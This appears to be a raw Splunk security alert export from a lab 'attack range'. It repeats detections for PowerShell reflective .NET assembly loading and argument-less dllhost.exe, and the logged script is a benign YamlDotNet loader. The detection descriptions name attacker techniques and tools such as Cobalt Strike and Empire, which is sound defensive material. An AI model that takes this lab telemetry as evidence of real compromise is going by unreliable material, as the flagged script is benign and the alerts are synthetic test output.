($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } }", UserID="'S-1-5-21-2251518177-1696790515-3014453336-500'", analyticstories="Hermetic Wiper", analyticstories="Malicious PowerShell", annotations="{\"analytic_story\": [\"Hermetic Wiper\", \"Malicious PowerShell\"], \"confidence\": 80, \"context\": [\"Source:Endpoint\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1059\", \"T1059.001\"], \"observable\": [{\"name\": \"Computer\", \"role\": [\"Victim\"], \"type\": \"Hostname\"}, {\"name\": \"UserID\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Hermetic Wiper", annotations.analytic_story="Malicious PowerShell", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1059", annotations.mitre_attack="T1059.001", count="1", firstTime="2022-10-02T00:16:30", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-10-02T00:16:30", risk_message="A suspicious powershell script contains reflective class assembly command in function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } } to load .net code in memory with EventCode 4104 in host win-dc-mhaag-attack-range-622.attackrange.local", risk_object="win-dc-mhaag-attack-range-622.attackrange.local", risk_object_type="system", risk_score="56.0", savedsearch_description="The following analytic utilizes PowerShell Script Block Logging (EventCode=4104) to identify suspicious PowerShell execution. Script Block Logging captures the command sent to PowerShell, the full command to be executed. Upon enabling, logs will output to Windows event logs. Dependent upon volume, enable no critical endpoints or all. This analytic identifies the use of PowerShell loading .net assembly via reflection. This is commonly found in malicious PowerShell usage, including Empire and Cobalt Strike. In addition, the `load(` value may be modifed by removing `(` and it will identify more events to review. During triage, review parallel processes using an EDR product or 4688 events. It will be important to understand the timeline of events around this activity. Review the entire logged PowerShell script block." 1664675731, search_name="ESCU - PowerShell Loading DotNET into Memory via Reflection - Rule", Computer="win-dc-mhaag-attack-range-622.attackrange.local", EventCode="4104", Opcode="15", ScriptBlockText="# Copyright 2016 Cloudbase Solutions Srl # # Licensed under the Apache License, Version 2.0 (the \"License\"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. # $here = Split-Path -Parent $MyInvocation.MyCommand.Path function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } } function Initialize-Assemblies { $requiredTypes = @( \"Parser\", \"MergingParser\", \"YamlStream\", \"YamlMappingNode\", \"YamlSequenceNode\", \"YamlScalarNode\", \"ChainedEventEmitter\", \"Serializer\", \"Deserializer\", \"SerializerBuilder\", \"StaticTypeResolver\" ) $yaml = [System.AppDomain]::CurrentDomain.GetAssemblies() | ? Location -Match \"YamlDotNet.dll\" if (!$yaml) { return Load-Assembly } foreach ($i in $requiredTypes){ if ($i -notin $yaml.DefinedTypes.Name) { Throw \"YamlDotNet is loaded but missing required types ($i). Older version installed on system?\" } } } Initialize-Assemblies | Out-Null", UserID="'S-1-5-21-2251518177-1696790515-3014453336-500'", analyticstories="Hermetic Wiper", analyticstories="Malicious PowerShell", annotations="{\"analytic_story\": [\"Hermetic Wiper\", \"Malicious PowerShell\"], \"confidence\": 80, \"context\": [\"Source:Endpoint\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1059\", \"T1059.001\"], \"observable\": [{\"name\": \"Computer\", \"role\": [\"Victim\"], \"type\": \"Hostname\"}, {\"name\": \"UserID\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Hermetic Wiper", annotations.analytic_story="Malicious PowerShell", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1059", annotations.mitre_attack="T1059.001", count="1", firstTime="2022-10-02T00:16:30", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-10-02T00:16:30", risk_message="A suspicious powershell script contains reflective class assembly command in # Copyright 2016 Cloudbase Solutions Srl # # Licensed under the Apache License, Version 2.0 (the \"License\"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. # $here = Split-Path -Parent $MyInvocation.MyCommand.Path function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } } function Initialize-Assemblies { $requiredTypes = @( \"Parser\", \"MergingParser\", \"YamlStream\", \"YamlMappingNode\", \"YamlSequenceNode\", \"YamlScalarNode\", \"ChainedEventEmitter\", \"Serializer\", \"Deserializer\", \"SerializerBuilder\", \"StaticTypeResolver\" ) $yaml = [System.AppDomain]::CurrentDomain.GetAssemblies() | ? Location -Match \"YamlDotNet.dll\" if (!$yaml) { return Load-Assembly } foreach ($i in $requiredTypes){ if ($i -notin $yaml.DefinedTypes.Name) { Throw \"YamlDotNet is loaded but missing required types ($i). Older version installed on system?\" } } } Initialize-Assemblies | Out-Null to load .net code in memory with EventCode 4104 in host win-dc-mhaag-attack-range-622.attackrange.local", risk_object="'S-1-5-21-2251518177-1696790515-3014453336-500'", risk_object_type="user", risk_score="56.0", savedsearch_description="The following analytic utilizes PowerShell Script Block Logging (EventCode=4104) to identify suspicious PowerShell execution. Script Block Logging captures the command sent to PowerShell, the full command to be executed. Upon enabling, logs will output to Windows event logs. Dependent upon volume, enable no critical endpoints or all. This analytic identifies the use of PowerShell loading .net assembly via reflection. This is commonly found in malicious PowerShell usage, including Empire and Cobalt Strike. In addition, the `load(` value may be modifed by removing `(` and it will identify more events to review. During triage, review parallel processes using an EDR product or 4688 events. It will be important to understand the timeline of events around this activity. Review the entire logged PowerShell script block." 1664675731, search_name="ESCU - PowerShell Loading DotNET into Memory via Reflection - Rule", Computer="win-dc-mhaag-attack-range-622.attackrange.local", EventCode="4104", Opcode="15", ScriptBlockText="# Copyright 2016 Cloudbase Solutions Srl # # Licensed under the Apache License, Version 2.0 (the \"License\"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. # $here = Split-Path -Parent $MyInvocation.MyCommand.Path function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } } function Initialize-Assemblies { $requiredTypes = @( \"Parser\", \"MergingParser\", \"YamlStream\", \"YamlMappingNode\", \"YamlSequenceNode\", \"YamlScalarNode\", \"ChainedEventEmitter\", \"Serializer\", \"Deserializer\", \"SerializerBuilder\", \"StaticTypeResolver\" ) $yaml = [System.AppDomain]::CurrentDomain.GetAssemblies() | ? Location -Match \"YamlDotNet.dll\" if (!$yaml) { return Load-Assembly } foreach ($i in $requiredTypes){ if ($i -notin $yaml.DefinedTypes.Name) { Throw \"YamlDotNet is loaded but missing required types ($i). Older version installed on system?\" } } } Initialize-Assemblies | Out-Null", UserID="'S-1-5-21-2251518177-1696790515-3014453336-500'", analyticstories="Hermetic Wiper", analyticstories="Malicious PowerShell", annotations="{\"analytic_story\": [\"Hermetic Wiper\", \"Malicious PowerShell\"], \"confidence\": 80, \"context\": [\"Source:Endpoint\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1059\", \"T1059.001\"], \"observable\": [{\"name\": \"Computer\", \"role\": [\"Victim\"], \"type\": \"Hostname\"}, {\"name\": \"UserID\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Hermetic Wiper", annotations.analytic_story="Malicious PowerShell", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1059", annotations.mitre_attack="T1059.001", count="1", firstTime="2022-10-02T00:16:30", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-10-02T00:16:30", risk_message="A suspicious powershell script contains reflective class assembly command in # Copyright 2016 Cloudbase Solutions Srl # # Licensed under the Apache License, Version 2.0 (the \"License\"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. # $here = Split-Path -Parent $MyInvocation.MyCommand.Path function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } } function Initialize-Assemblies { $requiredTypes = @( \"Parser\", \"MergingParser\", \"YamlStream\", \"YamlMappingNode\", \"YamlSequenceNode\", \"YamlScalarNode\", \"ChainedEventEmitter\", \"Serializer\", \"Deserializer\", \"SerializerBuilder\", \"StaticTypeResolver\" ) $yaml = [System.AppDomain]::CurrentDomain.GetAssemblies() | ? Location -Match \"YamlDotNet.dll\" if (!$yaml) { return Load-Assembly } foreach ($i in $requiredTypes){ if ($i -notin $yaml.DefinedTypes.Name) { Throw \"YamlDotNet is loaded but missing required types ($i). Older version installed on system?\" } } } Initialize-Assemblies | Out-Null to load .net code in memory with EventCode 4104 in host win-dc-mhaag-attack-range-622.attackrange.local", risk_object="win-dc-mhaag-attack-range-622.attackrange.local", risk_object_type="system", risk_score="56.0", savedsearch_description="The following analytic utilizes PowerShell Script Block Logging (EventCode=4104) to identify suspicious PowerShell execution. Script Block Logging captures the command sent to PowerShell, the full command to be executed. Upon enabling, logs will output to Windows event logs. Dependent upon volume, enable no critical endpoints or all. This analytic identifies the use of PowerShell loading .net assembly via reflection. This is commonly found in malicious PowerShell usage, including Empire and Cobalt Strike. In addition, the `load(` value may be modifed by removing `(` and it will identify more events to review. During triage, review parallel processes using an EDR product or 4688 events. It will be important to understand the timeline of events around this activity. Review the entire logged PowerShell script block." 1664668800, search_name="ESCU - Suspicious DLLHost no Command Line Arguments - Rule", orig_time="1664668800", analyticstories="Cobalt Strike", annotations="{\"analytic_story\": [\"Cobalt Strike\"], \"confidence\": 70, \"context\": [\"Source:Endpoint\", \"Stage:Initial Access\", \"Stage:Execution\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1055\"], \"observable\": [{\"name\": \"dest\", \"role\": [\"Victim\"], \"type\": \"Endpoint\"}, {\"name\": \"User\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Cobalt Strike", annotations.context="Source:Endpoint", annotations.context="Stage:Initial Access", annotations.context="Stage:Execution", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1055", count="1", dest="win-dc-mhaag-attack-range-622.attackrange.local", info_max_time="+Infinity", info_min_time="0.000", parent_process_name="unknown", process="C:\\Windows\\System32\\dllhost.exe", process_id="4588", process_name="dllhost.exe", process_path="C:\\Windows\\System32\\dllhost.exe", risk_message="Suspicious dllhost.exe process with no command line arguments executed on win-dc-mhaag-attack-range-622.attackrange.local by $user$", risk_object="win-dc-mhaag-attack-range-622.attackrange.local", risk_object_type="system", risk_score="49.0", savedsearch_description="The following analytic identifies DLLHost.exe with no command line arguments. It is unusual for DLLHost.exe to execute with no command line arguments present. This particular behavior is common with malicious software, including Cobalt Strike. During investigation, identify any network connections and parallel processes. Identify any suspicious module loads related to credential dumping or file writes. DLLHost.exe is natively found in C:\\Windows\\system32 and C:\\Windows\\syswow64." 1664668800, search_name="ESCU - Suspicious DLLHost no Command Line Arguments - Rule", orig_time="1664668800", analyticstories="Cobalt Strike", annotations="{\"analytic_story\": [\"Cobalt Strike\"], \"confidence\": 70, \"context\": [\"Source:Endpoint\", \"Stage:Initial Access\", \"Stage:Execution\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1055\"], \"observable\": [{\"name\": \"dest\", \"role\": [\"Victim\"], \"type\": \"Endpoint\"}, {\"name\": \"User\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Cobalt Strike", annotations.context="Source:Endpoint", annotations.context="Stage:Initial Access", annotations.context="Stage:Execution", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1055", count="1", dest="win-dc-mhaag-attack-range-622.attackrange.local", info_max_time="+Infinity", info_min_time="0.000", parent_process_name="unknown", process="C:\\Windows\\System32\\dllhost.exe", process_id="0x11ec", process_name="dllhost.exe", process_path="C:\\Windows\\System32\\dllhost.exe", risk_message="Suspicious dllhost.exe process with no command line arguments executed on win-dc-mhaag-attack-range-622.attackrange.local by $user$", risk_object="win-dc-mhaag-attack-range-622.attackrange.local", risk_object_type="system", risk_score="49.0", savedsearch_description="The following analytic identifies DLLHost.exe with no command line arguments. It is unusual for DLLHost.exe to execute with no command line arguments present. This particular behavior is common with malicious software, including Cobalt Strike. During investigation, identify any network connections and parallel processes. Identify any suspicious module loads related to credential dumping or file writes. DLLHost.exe is natively found in C:\\Windows\\system32 and C:\\Windows\\syswow64." 1664672132, search_name="ESCU - PowerShell Loading DotNET into Memory via Reflection - Rule", Computer="win-dc-mhaag-attack-range-622.attackrange.local", EventCode="4104", Opcode="15", ScriptBlockText="function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } }", UserID="'S-1-5-21-2251518177-1696790515-3014453336-500'", analyticstories="Hermetic Wiper", analyticstories="Malicious PowerShell", annotations="{\"analytic_story\": [\"Hermetic Wiper\", \"Malicious PowerShell\"], \"confidence\": 80, \"context\": [\"Source:Endpoint\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1059\", \"T1059.001\"], \"observable\": [{\"name\": \"Computer\", \"role\": [\"Victim\"], \"type\": \"Hostname\"}, {\"name\": \"UserID\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Hermetic Wiper", annotations.analytic_story="Malicious PowerShell", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1059", annotations.mitre_attack="T1059.001", count="1", firstTime="2022-10-01T23:16:30", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-10-01T23:16:30", risk_message="A suspicious powershell script contains reflective class assembly command in function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } } to load .net code in memory with EventCode 4104 in host win-dc-mhaag-attack-range-622.attackrange.local", risk_object="'S-1-5-21-2251518177-1696790515-3014453336-500'", risk_object_type="user", risk_score="56.0", savedsearch_description="The following analytic utilizes PowerShell Script Block Logging (EventCode=4104) to identify suspicious PowerShell execution. Script Block Logging captures the command sent to PowerShell, the full command to be executed. Upon enabling, logs will output to Windows event logs. Dependent upon volume, enable no critical endpoints or all. This analytic identifies the use of PowerShell loading .net assembly via reflection. This is commonly found in malicious PowerShell usage, including Empire and Cobalt Strike. In addition, the `load(` value may be modifed by removing `(` and it will identify more events to review. During triage, review parallel processes using an EDR product or 4688 events. It will be important to understand the timeline of events around this activity. Review the entire logged PowerShell script block." 1664672132, search_name="ESCU - PowerShell Loading DotNET into Memory via Reflection - Rule", Computer="win-dc-mhaag-attack-range-622.attackrange.local", EventCode="4104", Opcode="15", ScriptBlockText="function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } }", UserID="'S-1-5-21-2251518177-1696790515-3014453336-500'", analyticstories="Hermetic Wiper", analyticstories="Malicious PowerShell", annotations="{\"analytic_story\": [\"Hermetic Wiper\", \"Malicious PowerShell\"], \"confidence\": 80, \"context\": [\"Source:Endpoint\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1059\", \"T1059.001\"], \"observable\": [{\"name\": \"Computer\", \"role\": [\"Victim\"], \"type\": \"Hostname\"}, {\"name\": \"UserID\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Hermetic Wiper", annotations.analytic_story="Malicious PowerShell", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1059", annotations.mitre_attack="T1059.001", count="1", firstTime="2022-10-01T23:16:30", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-10-01T23:16:30", risk_message="A suspicious powershell script contains reflective class assembly command in function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } } to load .net code in memory with EventCode 4104 in host win-dc-mhaag-attack-range-622.attackrange.local", risk_object="win-dc-mhaag-attack-range-622.attackrange.local", risk_object_type="system", risk_score="56.0", savedsearch_description="The following analytic utilizes PowerShell Script Block Logging (EventCode=4104) to identify suspicious PowerShell execution. Script Block Logging captures the command sent to PowerShell, the full command to be executed. Upon enabling, logs will output to Windows event logs. Dependent upon volume, enable no critical endpoints or all. This analytic identifies the use of PowerShell loading .net assembly via reflection. This is commonly found in malicious PowerShell usage, including Empire and Cobalt Strike. In addition, the `load(` value may be modifed by removing `(` and it will identify more events to review. During triage, review parallel processes using an EDR product or 4688 events. It will be important to understand the timeline of events around this activity. Review the entire logged PowerShell script block." 1664672132, search_name="ESCU - PowerShell Loading DotNET into Memory via Reflection - Rule", Computer="win-dc-mhaag-attack-range-622.attackrange.local", EventCode="4104", Opcode="15", ScriptBlockText="# Copyright 2016 Cloudbase Solutions Srl # # Licensed under the Apache License, Version 2.0 (the \"License\"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. # $here = Split-Path -Parent $MyInvocation.MyCommand.Path function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } } function Initialize-Assemblies { $requiredTypes = @( \"Parser\", \"MergingParser\", \"YamlStream\", \"YamlMappingNode\", \"YamlSequenceNode\", \"YamlScalarNode\", \"ChainedEventEmitter\", \"Serializer\", \"Deserializer\", \"SerializerBuilder\", \"StaticTypeResolver\" ) $yaml = [System.AppDomain]::CurrentDomain.GetAssemblies() | ? Location -Match \"YamlDotNet.dll\" if (!$yaml) { return Load-Assembly } foreach ($i in $requiredTypes){ if ($i -notin $yaml.DefinedTypes.Name) { Throw \"YamlDotNet is loaded but missing required types ($i). Older version installed on system?\" } } } Initialize-Assemblies | Out-Null", UserID="'S-1-5-21-2251518177-1696790515-3014453336-500'", analyticstories="Hermetic Wiper", analyticstories="Malicious PowerShell", annotations="{\"analytic_story\": [\"Hermetic Wiper\", \"Malicious PowerShell\"], \"confidence\": 80, \"context\": [\"Source:Endpoint\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1059\", \"T1059.001\"], \"observable\": [{\"name\": \"Computer\", \"role\": [\"Victim\"], \"type\": \"Hostname\"}, {\"name\": \"UserID\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Hermetic Wiper", annotations.analytic_story="Malicious PowerShell", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1059", annotations.mitre_attack="T1059.001", count="1", firstTime="2022-10-01T23:16:30", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-10-01T23:16:30", risk_message="A suspicious powershell script contains reflective class assembly command in # Copyright 2016 Cloudbase Solutions Srl # # Licensed under the Apache License, Version 2.0 (the \"License\"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. # $here = Split-Path -Parent $MyInvocation.MyCommand.Path function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } } function Initialize-Assemblies { $requiredTypes = @( \"Parser\", \"MergingParser\", \"YamlStream\", \"YamlMappingNode\", \"YamlSequenceNode\", \"YamlScalarNode\", \"ChainedEventEmitter\", \"Serializer\", \"Deserializer\", \"SerializerBuilder\", \"StaticTypeResolver\" ) $yaml = [System.AppDomain]::CurrentDomain.GetAssemblies() | ? Location -Match \"YamlDotNet.dll\" if (!$yaml) { return Load-Assembly } foreach ($i in $requiredTypes){ if ($i -notin $yaml.DefinedTypes.Name) { Throw \"YamlDotNet is loaded but missing required types ($i). Older version installed on system?\" } } } Initialize-Assemblies | Out-Null to load .net code in memory with EventCode 4104 in host win-dc-mhaag-attack-range-622.attackrange.local", risk_object="'S-1-5-21-2251518177-1696790515-3014453336-500'", risk_object_type="user", risk_score="56.0", savedsearch_description="The following analytic utilizes PowerShell Script Block Logging (EventCode=4104) to identify suspicious PowerShell execution. Script Block Logging captures the command sent to PowerShell, the full command to be executed. Upon enabling, logs will output to Windows event logs. Dependent upon volume, enable no critical endpoints or all. This analytic identifies the use of PowerShell loading .net assembly via reflection. This is commonly found in malicious PowerShell usage, including Empire and Cobalt Strike. In addition, the `load(` value may be modifed by removing `(` and it will identify more events to review. During triage, review parallel processes using an EDR product or 4688 events. It will be important to understand the timeline of events around this activity. Review the entire logged PowerShell script block." 1664672132, search_name="ESCU - PowerShell Loading DotNET into Memory via Reflection - Rule", Computer="win-dc-mhaag-attack-range-622.attackrange.local", EventCode="4104", Opcode="15", ScriptBlockText="# Copyright 2016 Cloudbase Solutions Srl # # Licensed under the Apache License, Version 2.0 (the \"License\"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. # $here = Split-Path -Parent $MyInvocation.MyCommand.Path function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } } function Initialize-Assemblies { $requiredTypes = @( \"Parser\", \"MergingParser\", \"YamlStream\", \"YamlMappingNode\", \"YamlSequenceNode\", \"YamlScalarNode\", \"ChainedEventEmitter\", \"Serializer\", \"Deserializer\", \"SerializerBuilder\", \"StaticTypeResolver\" ) $yaml = [System.AppDomain]::CurrentDomain.GetAssemblies() | ? Location -Match \"YamlDotNet.dll\" if (!$yaml) { return Load-Assembly } foreach ($i in $requiredTypes){ if ($i -notin $yaml.DefinedTypes.Name) { Throw \"YamlDotNet is loaded but missing required types ($i). Older version installed on system?\" } } } Initialize-Assemblies | Out-Null", 